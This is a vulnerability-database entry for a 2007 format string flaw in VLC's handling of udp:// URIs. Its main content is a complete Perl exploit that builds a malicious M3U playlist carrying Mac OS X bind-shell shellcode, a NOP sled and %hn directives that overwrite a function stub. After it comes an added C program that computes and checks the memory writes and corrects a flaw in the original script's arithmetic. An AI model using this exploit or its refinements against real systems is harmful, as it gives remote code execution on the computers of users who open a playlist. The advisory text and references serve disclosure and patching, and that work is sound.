VLC Media Player Malformed "udp://" URI Format String Handling Vulnerability

Vulnerability ID: 1111928    Vulnerability type: Format string
Published: 2007-01-02    Updated: 2007-02-01
CVE: CVE-2007-0017    CNNVD ID: CNNVD-200701-002
Platform: OSX    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/3070
https://www.securityfocus.com/bid/21852
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-002
|Details
VideoLAN VLC media player is a free, open-source, cross-platform multimedia player (and multimedia framework) developed by the French VideoLAN project. It plays many kinds of media (files, discs, etc.) and many audio and video formats (WMV, MP3, etc.). VLC media player has a format string vulnerability in its handling of URI strings that begin with "udp://": the attacker-supplied URI is used as a printf-style format string, so "%n"-family directives in it can write to memory. A remote attacker can exploit this to execute arbitrary code on the user's machine by luring the user to a malicious web page or into opening a malicious M3U playlist. The bug is in VLC 0.8.6 itself; the published exploit below targets VLC on Mac OS X.
|Exploit
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#

$outfile = "pwnage.m3u";

# x86 Mac OS X bind shell: socket/bind/listen/accept on TCP port 4444,
# dup2 the connection onto stdin/stdout/stderr, then execve /bin//sh.
$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";

# Memory map and pattern-search hits used to pick $jmpaddr:
# MALLOC                 02800000-03008000 [ 8224K] rw-/rwx SM=COW  ...e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92

# Address the hijacked pointer is redirected to. 0x41424344 is a placeholder;
# replace it with one of the sled addresses found above.
$jmpaddr = 0x41424344;

# Split it into two 16-bit halves; each half is written by its own %hn.
$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;

printf "jump address is: 0x%04x%04x\n", $hi, $lo;

# Format directives, percent-encoded ("%25" = '%', "%24" = '$') so that they
# reach the format function as '%' and '$' after URI decoding: each %<width>d
# advances the output counter and each positional %<n>$hn stores it.
# Argument 23 is $writeaddr+2, argument 24 is $writeaddr (see the udp:// line).
$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" . ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;

# Pointer to overwrite: the dyld stub for vfprintf, so the next call through
# the stub executes the shellcode.
$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>

printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile") or die "cannot open $outfile: $!";

# First entry: NOP sled + shellcode in the EXTINF title. Second entry: the
# udp:// URI carrying the two target addresses, the format directives, and
# 'i' filler sized as 999 minus the length of the "Can't get file status for "
# message prefix.
print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . "\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";

close(PWNED);

# milw0rm.com [2007-01-02]
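The two-short-write arithmetic the script above relies on, as an added worked example in C (not code from this page, from Kevin Finisterre, or from VLC). It plans the `%<width>d` / `%<slot>$hn` pairs for a target pointer, percent-encodes them the way the script does, and replays the format function's byte counter against a 32-bit word to confirm what lands in memory, without executing any `%n`. Slots 23 and 24 and the pointer layout ($writeaddr+2 in slot 23, $writeaddr in slot 24) come from the script; treating the script's 0x24 as the number of bytes already emitted before the first padded field is an assumption. The example also goes beyond the script: the script computes the second width as $hi-$lo, which is negative whenever the high half of $jmpaddr is smaller than the low half (as it is for the heap addresses in its own comments), whereas here the smaller half is written first and every width is reduced modulo 0x10000, so either ordering works.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Positional argument slots holding the two target addresses when the URI is
 * used as a format string. Taken from the script: slot 23 = $writeaddr+2
 * (high half of the pointer), slot 24 = $writeaddr (low half). */
#define SLOT_HI 23
#define SLOT_LO 24

struct hn_plan {
    unsigned first_pad, second_pad;    /* %<width>d field widths */
    unsigned first_slot, second_slot;  /* %<slot>$hn positional slots */
    uint16_t first_val, second_val;    /* 16-bit value each %hn stores */
};

/* Plan two %hn writes that leave 'target' in a little-endian 32-bit pointer.
 * 'already' = bytes emitted before the first padded field (assumed to be what
 * the script's 0x24 means). The smaller half is written first and widths are
 * reduced modulo 0x10000, so the counter only grows and hi < lo is fine. */
static struct hn_plan plan_two_shorts(uint32_t target, unsigned already)
{
    uint16_t lo = target & 0xffff, hi = (target >> 16) & 0xffff;
    struct hn_plan p;

    if (lo <= hi) {
        p.first_val = lo;  p.first_slot = SLOT_LO;
        p.second_val = hi; p.second_slot = SLOT_HI;
    } else {
        p.first_val = hi;  p.first_slot = SLOT_HI;
        p.second_val = lo; p.second_slot = SLOT_LO;
    }
    /* A %d width is a minimum: a width below 12 could be exceeded by the
     * printed int (11 chars with sign), so add a full wrap in that case. */
    p.first_pad = (p.first_val - already) & 0xffff;
    if (p.first_pad < 12) p.first_pad += 0x10000;
    p.second_pad = (p.second_val - p.first_val) & 0xffff;
    if (p.second_pad < 12) p.second_pad += 0x10000;
    return p;
}

/* Raw printf directives: "%<pad>d%<slot>$hn" twice. */
static int render_format(const struct hn_plan *p, char *out, size_t n)
{
    return snprintf(out, n, "%%%ud%%%u$hn%%%ud%%%u$hn",
                    p->first_pad, p->first_slot, p->second_pad, p->second_slot);
}

/* Percent-encode '%' and '$' as the script does ("%25", "%24") so that the
 * directives survive one round of URI decoding. Returns the output length. */
static size_t uri_escape(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        const char *rep = *in == '%' ? "%25" : *in == '$' ? "%24" : NULL;
        size_t len = rep ? 3 : 1;
        if (o + len >= n) break;             /* keep room for the NUL */
        memcpy(out + o, rep ? rep : in, len);
        o += len;
    }
    out[o] = '\0';
    return o;
}

/* Escaped directives for 'target', as they would follow "udp://--" and the
 * two packed addresses in the playlist line. Uses a static buffer. */
static const char *escaped_directives(uint32_t target, unsigned already)
{
    static char raw[64], esc[128];
    struct hn_plan p = plan_two_shorts(target, already);
    render_format(&p, raw, sizeof raw);
    uri_escape(raw, esc, sizeof esc);
    return esc;
}

/* %hn stores the low 16 bits of the byte counter at the slot's address. */
static void store_half(uint8_t word[4], unsigned slot, unsigned counter)
{
    unsigned off = (slot == SLOT_HI) ? 2 : 0;   /* little-endian word */
    word[off]     = counter & 0xff;
    word[off + 1] = (counter >> 8) & 0xff;
}

/* Replay the byte counter and both %hn stores against a zeroed 32-bit word.
 * Returns the pointer value left in memory. */
static uint32_t simulate_writes(const struct hn_plan *p, unsigned already)
{
    uint8_t word[4] = {0, 0, 0, 0};
    unsigned counter = already;

    counter += p->first_pad;                    /* %<first_pad>d  */
    store_half(word, p->first_slot, counter);   /* %<first_slot>$hn */
    counter += p->second_pad;                   /* %<second_pad>d */
    store_half(word, p->second_slot, counter);  /* %<second_slot>$hn */
    return (uint32_t)word[0] | (uint32_t)word[1] << 8 |
           (uint32_t)word[2] << 16 | (uint32_t)word[3] << 24;
}

/* Plan, replay, and return what lands in the pointer. */
static uint32_t roundtrip(uint32_t target, unsigned already)
{
    struct hn_plan p = plan_two_shorts(target, already);
    return simulate_writes(&p, already);
}

int main(void)
{
    /* First value is a sled hit from the script's comments, second is its
     * placeholder, third has lo <= hi to exercise the other write order. */
    uint32_t targets[] = { 0x0298589eu, 0x41424344u, 0x01000000u };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++)
        printf("target 0x%08x: %s -> lands 0x%08x\n", targets[i],
               escaped_directives(targets[i], 0x24), roundtrip(targets[i], 0x24));
    return 0;
}
```

For 0x0298589e the plan writes the high half (0x0298) first through slot 23 and then the low half (0x589e) through slot 24, giving `%25628d%2523%24hn%2522022d%2524%24hn` before the 'i' filler; the script's own formula would have produced a negative second width for that address.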
|Affected products
VideoLAN VLC media player 0.8.6 + Debian Linux 4.0 sparc + Debian Linux 4.0 s/390 + Debian Linux 4.0 powerpc
|References

Source: XF
Name: vlc-mediaplayer-udp-format-string (31226)
Link: http://xforce.iss.net/xforce/xfdb/31226
Source: www.videolan.org
Link: http://www.videolan.org/sa0701.html
Source: www.videolan.org
Link: http://www.videolan.org/patches/vlc-0.8.6-MOAB-02-01-2007.patch
Source: MLIST
Name: [vlc-devel] 20070102 Security hole in VLC media player for Mac...
Link: http://www.via.ecp.fr/via/ml/vlc-devel/2007-01/msg00005.html
Source: VUPEN
Name: ADV-2007-0026
Link: http://www.frsirt.com/english/advisories/2007/0026
Source: trac.videolan.org
Link: http://trac.videolan.org/vlc/changeset/18481
Source: SECTRACK
Name: 1017464
Link: http://securitytracker.com/id?1017464
Source: SECUNIA
Name: 23592
Link: http://secunia.com/advisories/23592
Source: MISC
Link: http://projects.info-pull.com/moab/MOAB-02-01-2007.html
Source: OSVDB
Name: 31163
Link: http://osvdb.org/31163
Source: MISC
Link: http://landonf.bikemonkey.org/code/macosx/MOAB_Day_2.20070103045559.6753.timor.html
Source: MISC
Link: http://applefun.blogspot.com/2007/01/moab-02-01-2007-vlc-media-player-udp.html
Source: BID
Name: 21852
Link: http://www.securityfocus.com/bid/21852